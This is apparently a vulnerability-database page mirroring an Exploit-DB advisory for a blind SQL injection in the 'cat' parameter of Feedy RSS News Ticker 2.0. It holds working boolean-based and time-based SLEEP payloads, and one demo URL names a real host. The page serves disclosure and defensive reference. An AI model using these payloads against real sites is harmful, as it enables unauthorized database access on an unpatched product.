header-logo
Suggest Exploit
vendor:
Feedy RSS News Ticker
by:
Özkan Mustafa Akkus (AkkuS)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Feedy RSS News Ticker
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:feedy_rss_news_ticker:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Feedy RSS News Ticker 2.0 – ‘cat’ SQL Injection

Feedy RSS News Ticker 2.0 is vulnerable to SQL Injection. The vulnerability exists in the 'cat' parameter of the 'category.php' page. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the backend database. The vulnerability can be exploited using boolean-based blind and AND/OR time-based blind SQL injection techniques.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Feedy RSS News Ticker 2.0 - 'cat' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux

# PoC: SQLi:
# Parameter: cat
# Type: boolean-based blind
# Demo: http://target/feedy/category.php?cat=
# Payload: 

cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC

# Type: AND/OR time-based blind
# Demo: http://demo.cudevo.com/feedy/category.php?cat=1
# Payload: 

cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg

Navigation

Suggest Exploit

Services By CQR